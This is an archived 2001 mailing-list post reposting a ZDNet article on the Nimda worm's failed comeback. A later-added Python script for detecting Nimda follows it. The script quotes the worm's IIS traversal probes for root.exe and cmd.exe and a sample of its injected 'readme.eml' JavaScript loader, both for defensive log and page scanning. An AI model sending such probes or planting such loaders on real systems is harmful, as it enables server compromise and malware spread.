[iwar] [fc:Nimda.comeback.thwarted]

From: Fred Cohen (fc@all.net)
Date: 2001-10-02 05:48:56


Return-Path: <sentto-279987-2601-1002026952-fc=all.net@returns.onelist.com>
Delivered-To: fc@all.net
Received: from 204.181.12.215 by localhost with POP3 (fetchmail-5.1.0) for fc@localhost (single-drop); Tue, 02 Oct 2001 05:52:36 -0700 (PDT)
Received: (qmail 12525 invoked by uid 510); 2 Oct 2001 12:49:19 -0000
Received: from n6.groups.yahoo.com (216.115.96.56) by 204.181.12.215 with SMTP; 2 Oct 2001 12:49:19 -0000
X-eGroups-Return: sentto-279987-2601-1002026952-fc=all.net@returns.onelist.com
Received: from [10.1.4.53] by n6.groups.yahoo.com with NNFMP; 02 Oct 2001 12:49:12 -0000
X-Sender: fc@big.all.net
X-Apparently-To: iwar@onelist.com
Received: (EGP: mail-7_4_1); 2 Oct 2001 12:49:11 -0000
Received: (qmail 34259 invoked from network); 2 Oct 2001 12:49:11 -0000
Received: from unknown (10.1.10.27) by l7.egroups.com with QMQP; 2 Oct 2001 12:49:11 -0000
Received: from unknown (HELO big.all.net) (65.0.156.78) by mta2 with SMTP; 2 Oct 2001 12:49:06 -0000
Received: (from fc@localhost) by big.all.net (8.9.3/8.7.3) id FAA03088 for iwar@onelist.com; Tue, 2 Oct 2001 05:48:56 -0700
Message-Id: <200110021248.FAA03088@big.all.net>
To: iwar@onelist.com (Information Warfare Mailing List)
Organization: I'm not allowed to say
X-Mailer: don't even ask
X-Mailer: ELM [version 2.5 PL1]
From: Fred Cohen <fc@all.net>
Mailing-List: list iwar@yahoogroups.com; contact iwar-owner@yahoogroups.com
Delivered-To: mailing list iwar@yahoogroups.com
Precedence: bulk
List-Unsubscribe: <mailto:iwar-unsubscribe@yahoogroups.com>
Date: Tue, 2 Oct 2001 05:48:56 -0700 (PDT)
Reply-To: iwar@yahoogroups.com
Subject: [iwar] [fc:Nimda.comeback.thwarted]
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit

Nimda comeback thwarted

By Robert Lemos, ZDNet News, 10/1/2001
http://dailynews.yahoo.com/h/zd/20010930/tc/nimda_comeback_thwarted_1.html

Enough people patched their computers to head off more problems from the
Nimda worm, which was targeted to reactivate itself after 10 days. 

A resurgence of the Nimda worm failed to materialize Friday, leaving
unfulfilled warnings that several security companies made this week. 

The e-mail component of the worm, which sends infected messages to each
entry in an infected computer's Outlook address book, reactivates 10
days after the original infection.  That part of the program had
antivirus researchers and security experts worried that the Nimda worm
was again set to spread quickly. 

But Friday morning, 10 days after the first infections started to take
hold, few signs heralded a return of the worm. 

"We have been checking throughout the entire day, and we are not seeing
anything," said John Harrington, director of marketing for e-mail
filtering service MessageLabs.  "Our gut feeling is that it is not going
to happen."

According to MessageLabs' Web site, the company has detected fewer than
1,600 copies of the virus since the start of the epidemic 10 days ago. 

Nimda--which is "admin," the shortened form of "system administrator,"
spelled backward--started spreading Sept. 18 and quickly infected PCs
and servers around the world.  Also known as "readme.exe" and
"W32.Nimda," the worm is the first to use four different methods to
infect not only PCs running Windows 95, 98, Me and 2000, but also
servers running Windows 2000. 

The worm spreads by e-mailing itself as an attachment, scanning for and
then infecting vulnerable Web servers running Microsoft's Internet
Information Server software, copying itself to shared disk drives on
networked PCs, and appending JavaScript code to Web pages that will
download the worm to surfers' PCs when they view the page. 

The e-mail component of the worm sends Nimda-infected messages every 10
days, counting from when the victim was originally infected.  Since the
virus is thought to have started Sept. 18 at 8:30 a.m. PDT, the first
new e-mails should have started going out early Friday. 

Only a few infected computers may be left, however. 

Anti-virus software maker Trend Micro said that while some companies
reported infections Friday, the number is still low. 

"We've seen a few infections in organizations that haven't done a
complete cleaning, but it's limited," said company spokeswoman Susan
Orbuch. 

Furthermore, compromised servers and PCs without Outlook installed will
only have a limited number of e-mail addresses to which to send
messages.  The worm also scans the browser cache on computers for saved
Web pages that contain e-mail addresses and sends infected messages to
those addresses as well. 

Servers that aren't used to browse the Internet will not have such a
cache. 


------------------
http://all.net/ 
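The article describes two of Nimda's four spreading methods in enough detail to check for them on a server: the worm probes IIS hosts over HTTP, and on a compromised server it appends JavaScript to served pages so that visiting browsers fetch the worm. The script below is an added illustration written for this archive entry; it is not code from the article, from ZDNet or from any vendor named above. It assumes a web-server log in IIS W3C extended format and the well-known request paths and page footer that Nimda used (the root.exe and cmd.exe traversal probes, and a `window.open("readme.eml", ...)` loader), which the article itself does not list. The sample log lines and HTML are constructed for the example, not captured traffic.

```python
"""Indicator checks for two Nimda spreading methods: HTTP probes against IIS
and the JavaScript loader appended to web pages on an infected server.
Added example for this archive page; not code from the article."""
import re
from urllib.parse import unquote

# Constructed sample IIS log (not real traffic). W3C extended format, fields:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_IIS_LOG = """\
2001-09-18 15:31:02 10.0.0.5 GET /scripts/root.exe /c+dir 404
2001-09-18 15:31:02 10.0.0.5 GET /MSADC/root.exe /c+dir 404
2001-09-18 15:31:03 10.0.0.5 GET /c/winnt/system32/cmd.exe /c+dir 404
2001-09-18 15:31:03 10.0.0.5 GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir 200
2001-09-18 15:31:04 10.0.0.5 GET /_vti_bin/..%c1%1c../winnt/system32/cmd.exe /c+dir 404
2001-09-18 15:32:10 10.0.0.9 GET /index.html - 200
2001-09-18 15:32:11 10.0.0.9 GET /images/logo.gif - 200
"""

# Constructed page with the footer Nimda appended to HTML files on a
# compromised server, so that browsers opening the page fetch readme.eml.
INFECTED_HTML = (
    "<html><body><h1>Welcome</h1></body></html>\n"
    '<html><script language="JavaScript">window.open("readme.eml", null, '
    '"resizable=no,top=6000,left=6000")</script></html>'
)
CLEAN_HTML = ("<html><body><h1>Welcome</h1>"
              "<script>window.open('help.html')</script></body></html>")


def decode_uri(raw: str) -> str:
    """Percent-decode repeatedly (the %255c variant double-encodes a backslash),
    then lower-case and normalise slashes so every traversal spelling looks alike."""
    path = raw
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.lower().replace("\\", "/")


def is_nimda_probe(uri_stem: str) -> bool:
    """True if the request path is one of the worm's propagation probes:
    the root.exe backdoor, or cmd.exe reached by directory traversal or via
    the C:/D: virtual roots that an earlier Code Red II infection leaves behind."""
    path = decode_uri(uri_stem)
    if path.endswith("root.exe"):
        return True
    if path.endswith("cmd.exe"):
        return ".." in path or path.startswith(("/c/", "/d/"))
    return False


LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\S+) (\S+) (\d+)$")


def scan_iis_log(text: str) -> list:
    """Return (client_ip, raw_uri_stem, status) for every probe in a W3C log.
    A 200 on a probe means the server answered the command and is worth
    treating as compromised, not merely scanned."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, method, stem, status = m.group(3), m.group(4), m.group(5), m.group(7)
        if method.upper() == "GET" and is_nimda_probe(stem):
            hits.append((ip, stem, int(status)))
    return hits


# The loader the worm appends: a script tag whose first call opens readme.eml.
INJECT_RE = re.compile(
    r'<script[^>]*>\s*window\.open\(\s*"readme\.eml"[^<]*</script>', re.IGNORECASE)


def find_injected_script(html: str):
    """Return the appended Nimda loader if the page carries one, else None."""
    m = INJECT_RE.search(html)
    return m.group(0) if m else None


if __name__ == "__main__":
    for ip, uri, status in scan_iis_log(SAMPLE_IIS_LOG):
        flag = "  (command executed)" if status == 200 else ""
        print(f"probe from {ip}: {uri} -> {status}{flag}")
    print("page carries Nimda loader:", find_injected_script(INFECTED_HTML) is not None)
```

Run against real logs by feeding the file contents to scan_iis_log and walking the web root with find_injected_script; the decoder deliberately leaves the %c1%1c overlong-UTF-8 form undecoded (Python rejects it, as a correct decoder should), which is why the cmd.exe check looks for any ".." rather than a clean "/../".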




This archive was generated by hypermail 2.1.2 : 2001-12-31 20:59:53 PST